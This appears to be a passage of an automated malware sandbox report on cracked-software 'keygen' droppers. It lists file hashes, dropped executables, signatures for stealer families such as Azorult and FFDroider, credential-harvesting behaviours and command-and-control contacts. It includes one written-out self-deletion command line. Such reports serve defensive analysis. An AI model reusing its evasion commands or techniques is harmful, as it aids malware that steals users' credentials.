| SHA256 | 5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914 |
| SHA512 | 8806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe
| MD5 | f250a9c692088cce4253332a205b1649 |
| SHA1 | 109c79124ce2bda06cab50ea5d97294d13d42b20 |
| SHA256 | 0a6c3a23510f93fcdcb6d5acc53ccccbcc51c68f14b1bcbd758ffbf135f8e882 |
| SHA512 | 80553664f188ae35cef1f89d188fb17df8a490367f8d6fa5f9897115bacf776373905bccd599353add684c7fa6c2554d04cbf1a7f6cc87b299d6c51da33c1b5e |
memory/3128-96-0x0000000000400000-0x0000000000667000-memory.dmp
memory/3128-103-0x0000000000400000-0x0000000000667000-memory.dmp
memory/4612-102-0x0000000000400000-0x0000000002B59000-memory.dmp
memory/1772-109-0x00000000013B0000-0x00000000013C2000-memory.dmp
memory/1772-108-0x0000000000E50000-0x0000000000E5E000-memory.dmp
memory/3128-118-0x0000000003BF0000-0x0000000003C00000-memory.dmp
memory/3128-112-0x0000000003A90000-0x0000000003AA0000-memory.dmp
memory/3128-125-0x00000000046A0000-0x00000000046A8000-memory.dmp
memory/3128-126-0x00000000046C0000-0x00000000046C8000-memory.dmp
memory/3128-128-0x0000000004780000-0x0000000004788000-memory.dmp
memory/3128-131-0x0000000004740000-0x0000000004748000-memory.dmp
memory/3128-132-0x00000000048C0000-0x00000000048C8000-memory.dmp
memory/3128-133-0x0000000004B70000-0x0000000004B78000-memory.dmp
memory/3128-134-0x0000000004A70000-0x0000000004A78000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 131af893fdda3509c156ba94660781b3 |
| SHA1 | 3f466bc9954868a5a0b5d9cb075b833f994cb559 |
| SHA256 | 239b4cbdfe71aa3819e1eee267f89e1a93abeb095e50b34c3ce506f636f9dd7e |
| SHA512 | 1f9f37bf2044d48b5b7402b456e78473d7c6d83be5825a25db4390437a520763d59c62500d70686992a17f5a2373364c77e46ec78914e1f521a17344813adf1e |
memory/3128-148-0x00000000046C0000-0x00000000046C8000-memory.dmp
memory/3128-135-0x00000000048E0000-0x00000000048E8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | d7e880e586b9dd277964d93c3f6f884b |
| SHA1 | ee406a37e18b02c0502a9e086d1bc72b088e6da3 |
| SHA256 | a1ef8ebc74ddc325e7c58c0fb9fc50d8001d99ab3fb7d1fdefff158571cbfcda |
| SHA512 | 3c60fbfebe83debe65ad491b6ddc7464f0cd7e2dbb2ccc1b24b583f53d864fc1ad4a2823488f45ddbd0337028b5a677fa0466bd6bf239ecbb8b9503f995a1d4d |
memory/3128-156-0x00000000048E0000-0x00000000048E8000-memory.dmp
memory/3128-179-0x0000000004A10000-0x0000000004A18000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 0397f70c5c68aaebb3f53b37dcd26e3a |
| SHA1 | b9b8c300ea402333b2c502c31f9a9d3f19949c43 |
| SHA256 | ca9899fcf8b04a34a9def2f9470260911b8fed40256988b1c02125bb2c5a2555 |
| SHA512 | d3d62b58cdeeddec2f7ffbb030a4dc24dace785e7a4b74c9ce5d2fc2a3b40b62b593f0f21c3033ef627154ff3e73692ffadd88bf373f0e5799c997b851c4779b |
memory/3128-158-0x0000000004A10000-0x0000000004A18000-memory.dmp
memory/3128-171-0x00000000046C0000-0x00000000046C8000-memory.dmp
memory/3128-181-0x00000000048E0000-0x00000000048E8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 7a21ab9db1f50f54d69938d418ff2a6a |
| SHA1 | e3415b651b56f5a43bfe719b5bb95d87611d099d |
| SHA256 | 5b710dd3610fbcf03d51e4b826e3ee929f0551f23a8b608312679b64488393ed |
| SHA512 | a8436eba37fc4cee57c29aedb75b5f89a8aee2f1fa51779183e7cddc50624ac4dcf1ae705b130c9877731c4ffcba6afa4878a8b6660d27ff72ca661c18cfc071 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d
| MD5 | 96de5522298c8e7f7298caae5c7fa1d4 |
| SHA1 | 0ae8a20d88d64852d1e609b67e182c3f92a87dde |
| SHA256 | ce43d22061873efd109e129caf60dc93cdc71c42413994f732178248fdd57ee3 |
| SHA512 | 4a561ab340713dea2db37943ed94d96bab774444bd4f5de84bafbf9e76cf51547403aba8c0f401dc8b8f9c1a02361cf889b2378a21fb5bf242877965de314858 |
memory/3128-220-0x0000000004580000-0x0000000004588000-memory.dmp
memory/3128-221-0x00000000045A0000-0x00000000045A8000-memory.dmp
memory/3128-229-0x0000000004640000-0x0000000004648000-memory.dmp
memory/3128-233-0x0000000004DC0000-0x0000000004DC8000-memory.dmp
memory/3128-232-0x0000000004640000-0x0000000004648000-memory.dmp
memory/3128-234-0x0000000005070000-0x0000000005078000-memory.dmp
memory/3128-235-0x0000000004F70000-0x0000000004F78000-memory.dmp
memory/3128-236-0x0000000004DD0000-0x0000000004DD8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 7eddb5441f9e3374e4c09e4f9eaec5db |
| SHA1 | e32740697dd2649f72ed4344de1aa4c4611304a3 |
| SHA256 | 30f7e45c78e5d357306683a5b7b4c3ec9490f2e9c4e8a01d0e52f82daffd6f48 |
| SHA512 | 0390af46dbc700800045f5c646012616d3063854c8e7c4e2d6d35781a2a60afa08902112734bd1381eb88e83d6578e1b5ffcb641a141c26d42a22d1c6b535881 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 09fd93e3d75dabb0ecfe41a3f97ecd87 |
| SHA1 | 309493cbe8ae60899cb71a23ba023c0f3ef1368d |
| SHA256 | b8de801b681d04bae5fccb9d45e7e4d634aed8e6b88ba3e61ffd8382a3727af3 |
| SHA512 | 6311d78fac1918664907694672a32420fd64fe02f730f30a6822bb0269f8847973abd5ae1f4cd2b2dd336935e154dfdd7ee16935f203ae3f2384574fd97bf954 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 1208b1144c765c5da9627174ecc30601 |
| SHA1 | 1e753f7da36ed81f7895f4de36c9add65dc466f8 |
| SHA256 | f32f3530a103c4a7c9245851aaf0fb5125951c8803ae4b329b33ddffd62b32d3 |
| SHA512 | 6bfcbef84beaced842e67e119b00dc4b2b5aea939d7b0fdd2688a57a09e3523e83e1b225b4980b5b19656f344e4680aa9274626556bc916e5aba394d6151a47e |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 6b5b1c58f266f850745cdf074dfba679 |
| SHA1 | 48c3dc5d762456e50ae8e7c6d7ca692a2e448af8 |
| SHA256 | 49ffbac4bf8b5565f4be0d66ba142ff156575d2de3570aa7b4820e4e264e0a2d |
| SHA512 | 4e41de7249803fae6d861ede30c6c0ca38f9f90e90fc52c40cef4a9ca199cbb913a25f2c89717142210dbd671ed14bd312772d6967be31591eefb1a5c10f5dd5 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 1bdad89e14c502647802c7f397b1c445 |
| SHA1 | 5a28fb09a469509f7cac6c7c4d6f10aeabb1c940 |
| SHA256 | 7d0daa32d20ffebe431f9760bd079f749117d662272857a1c2b93674b442a42f |
| SHA512 | ea27ba8f4c5394e0fbd2725556b1cc332787c4ed1136ba2cd8381b5858d2fe12c696bc20546f9bf5371c14a941721950d46a1c50210ad7c6391f9d7318e6140e |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | d4a3285968ecab86d9bdaeddad0f25a2 |
| SHA1 | a1d8542429d3f276d4fb0ad5619d09613d9d87b2 |
| SHA256 | 0461cc6edb9444b1532ae97f8f2c08e08f24816d0da7c318eaa8dc92d1a04a78 |
| SHA512 | 30f76d9e4d2cf9dc49d8865d0b0cb733cc9d78cff6957125d959487db82acc7d33e303435def46f1c014a6011071c732540e6ae20b35b30df0d002277d391043 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | cacce1ae356771810ccaf23e3f2b5b9d |
| SHA1 | 8e6baa63dea4a3b9a5f066479e642a6fbce5d1e8 |
| SHA256 | fcd4be44fb83a976735acfab85804138653f0a2b70ebbfa5371abaac9be6f87c |
| SHA512 | 328747137b57c323cb8243fa52afa1fb00ef1d9253a7fd7031958805985182f36321e1d991891d24c5eed776dfa59adcfb6a7150974a66a9980f6eab27ae7113 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 704417ba46c5a508ba6181bffe798641 |
| SHA1 | 055c1d9c2257d65e4a2f9161a6befcdb75470f88 |
| SHA256 | d811eccb0bb036f76263f239c6ed4f9e613480c544b7130285afd8a5b5389463 |
| SHA512 | f020745e684828cafdba8d68d37fa62e8d18079554baaa2aa5e7af1a9d5942bb3c2ff8b9f924b07e70724a1da608cfb6c9ea0fb991188710e2b7dc85dd2f499d |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | d86f9199cb5093b8867e1db3fb965f2c |
| SHA1 | a96c1d7497f9a9cb9934a6ad1e77984355035747 |
| SHA256 | cd847288ff5f268c94ac844472cffadafa8285b77b63a21bece93a2c8bb41468 |
| SHA512 | e134365cd96eb63e578a637c3536fe9e2edb495d44c84ff5ea3a78a6847914a0eb70f226a743aee17a6defa93cfae98fb0155317a560211d3d0e62c46bd52f4f |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 19fbf9968f26f8785d2579d857cdbc6b |
| SHA1 | 3f5577adc6a4257af5ca5ec2afdb95191191d06d |
| SHA256 | 87dd8ddb32ce855391fb14cda5038cab71e799ec3fa1bbf13edc4e347e9c3453 |
| SHA512 | 1e033d583f4dfbb2fdc2676ab43ee1a8bc23fac54f3bddc01774c02f5ee2e6086744c0a144bf902d479f0b3fb5b8a6dc219ae9d044c9a8fbe34d1212e7ea80e2 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 3f9892b86e97f6f6672da2aae4f6c2b1 |
| SHA1 | e3cbfa966258bb0b7876e22159a84c1779f5bf7d |
| SHA256 | 68ea36d2e4a7b07686cb3d5c87df65a0a17619de891d8cf090ee687aabd23b3d |
| SHA512 | f8c82413ab69963d9bddc529bea148290313b5ae7c04dfc62521ea15ab0f62794727793b5d750fc6ac23a9bf965f55b4b2edf0725f32a0500e8ec0eddbe83210 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | d8ee8db93a888442a013d2964b936548 |
| SHA1 | e6dc9c66aede826aa0fa6d92709c062844a10c8f |
| SHA256 | e27d79774a1ad3f3680d074a98f769744a08563da6257ae113fa3924b8565eb1 |
| SHA512 | 4c7261d4fd37ad0cb27ce1adc5b7dee0064bc31aa3fefd7ee212f442d9c80445b318f07aa0d7fbcc2b47dfaa37faaa3e27ba02b4df8ea2f80922a29d1751d0df |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 90f342fe9ffbf819e607282a603a7d43 |
| SHA1 | bf774edfa7d522772bc5db337e5c2d67f34f2e1d |
| SHA256 | 42f2e65c356567d709c6bddcbc768709eeb4612a91c78efc919a79d370126224 |
| SHA512 | 91dcebc9c4b288d50f815578de95a56af7038fd655390fa19d30dd416901da770e22dfe2bae112bb5c9093ca3b683ae564e3c5b2d227dc5217fc914aaeff7d20 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 4a38907630302671c72ee92d0779f2ab |
| SHA1 | b8cbd7f41137b5540134bd4566b31cae7fa84e08 |
| SHA256 | 24d2eeeb382dff1c4fd23bbf726674cbc89bbb1d0f5da5a6f5392151f8218cff |
| SHA512 | cc4c161d6a127dffa28957d9850a6f8bc3e3621257e11d0c8219d93c951ed873e291f7978e2cfd1c4636015f37ecec9cd0856448427929b550ad9b355f70838f |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 6de20428cd5a450e33d42acc597946d8 |
| SHA1 | ccdea1bc0f0b2ff01ed92a27cc3d603631ca420c |
| SHA256 | ce4dabf29b75ff731ed9db5962f838818b7c23cf2efe34e4c39d5b1933868612 |
| SHA512 | 56110393e9d1f43651cecac4a0d1bdb690c777f5d2389afff1cbcaac3c8831044c9e7880456e66c53e960b19e089dc30f55f1e16c9745a83ed79f58051db1450 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.INTEG.RAW
| MD5 | 0489b6e31348e1ead95f955bc05139ea |
| SHA1 | 108d147c84ad6bd223da450f571480705aeda47f |
| SHA256 | a9dc26c0cb9ea7a42d34714b8773b3e33d84d966a88481fdd2e73470ee788d88 |
| SHA512 | 733161815ed7a2da02319202a5b7b696a976cadfdc066b0226f094eb3fcac66ce1165ac140d754df94ade849dde820f46c5f1ac1d9de8c71f186a1b26a669938 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm
| MD5 | 5771ea8d5dd037a746905e9ecfc9d24f |
| SHA1 | 2255bbe04da92a81a4cbb62dc4d83d8d59a3f4fc |
| SHA256 | 841291763cdb3d6fc45928396d5d89688b8da744b8e69e01cbdd33476ccd674a |
| SHA512 | 2dd766486b8d8a475cc88215634b560359b8e1e2bafd3d5124bfc1edf3514012126ed55602d4b57d817be730b0a25361921e055e2d2dfcf768215d329dd00032 |
memory/3128-622-0x0000000000400000-0x0000000000667000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe
| MD5 | 0388a1ce1bb8c076387b69ffcb3b40ec |
| SHA1 | 3ec08a53ec024d9be6346440848c37d0e0d7bb80 |
| SHA256 | 448febc4311881856de2c237285907fe9470818e169946b0dbf1362f332e070a |
| SHA512 | ea5af764d0373c8b9a5faf6d7094c76c9c321e227713bceecd49df50fa888e8fd04b1dfe16c4b75a8727717582b06383825e5d4317db1b875951ee240edd71d5 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe
| MD5 | 9a6071c1a67be3fb247f857fe5903bbf |
| SHA1 | 4a2e14763c51537e8695014007eceaf391a3f600 |
| SHA256 | 01a9cb71df1d038bbec243ec7f2c1dd12d65a735297469c7f72be80886842e3c |
| SHA512 | c862ed8670b48e23b081e1c91280599ffdd963e714665b80553b41540cb3584c823a25f05c75e47eaea1473c687a9ef7c9a219d724d059e5bd77ac6d127f5e68 |
memory/3256-642-0x0000000000FE0000-0x0000000000FFE000-memory.dmp
memory/3256-643-0x0000000002F40000-0x0000000002F5A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
| MD5 | 7009fb80a52366b6c2cd8ec052a65791 |
| SHA1 | db0894463edf3ac11e5ca4b4584e8f10d75810f6 |
| SHA256 | 767c546decf6f669263e4a0a87a0f5d92234e031e9a0de3733fa954a8f3e0255 |
| SHA512 | 26e50e4b3d0b5fe866423b9ae0c02f61882f632fe4a16c05da117c02fae9aea26a6c81458e4b0bc2bda8acd0407565132f8bd6b7d3e828dd90fc280b1f15f079 |
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
| MD5 | 9910203407b2605107587e954081c575 |
| SHA1 | 8037bfb3b779fbbb3273df4f5c63d15b9589ce95 |
| SHA256 | 07b00c604d6473439dcd16b47cbefa450aad400871cb2215f0814547aca81b49 |
| SHA512 | ba2c532d16eb259ae1621ac6ab668b4da28b2a842cb7320eee11982e2b835979c1ec6c566e3207e798fd2d0767070a568d2cd32dbb19200572afb2c7b32a68be |
memory/1772-672-0x00000000006B0000-0x00000000006B6000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-11-08 22:29
Reported
2024-11-08 22:32
Platform
win7-20240903-en
Max time kernel
119s
Max time network
120s
Command Line
Signatures
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2192 wrote to memory of 2592 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2192 wrote to memory of 2592 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2192 wrote to memory of 2592 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2192 wrote to memory of 2592 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2592 wrote to memory of 1908 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE |
| PID 2592 wrote to memory of 1908 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE |
| PID 2592 wrote to memory of 1908 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE |
| PID 2592 wrote to memory of 1908 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 89.116.109.30:443 | evaexpand.com | tcp |
| GB | 89.116.109.30:443 | evaexpand.com | tcp |
| GB | 89.116.109.30:443 | evaexpand.com | tcp |
| GB | 89.116.109.30:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 89.116.109.29:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 89.116.109.163:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.22:80 | crl.microsoft.com | tcp |
Files
memory/2192-0-0x00000000000F0000-0x0000000000108000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-11-08 22:29
Reported
2024-11-08 22:32
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Azorult
Azorult family
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
FFDroider
FFDroider payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
Ffdroider family
GCleaner
Gcleaner family
OnlyLogger
Onlylogger family
Pony family
Pony,Fareit
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\chrome3.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe | N/A |
Executes dropped EXE
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4508 set thread context of 2288 | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe |
| PID 4492 set thread context of 3192 | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | C:\Windows\explorer.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
| File opened for modification | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
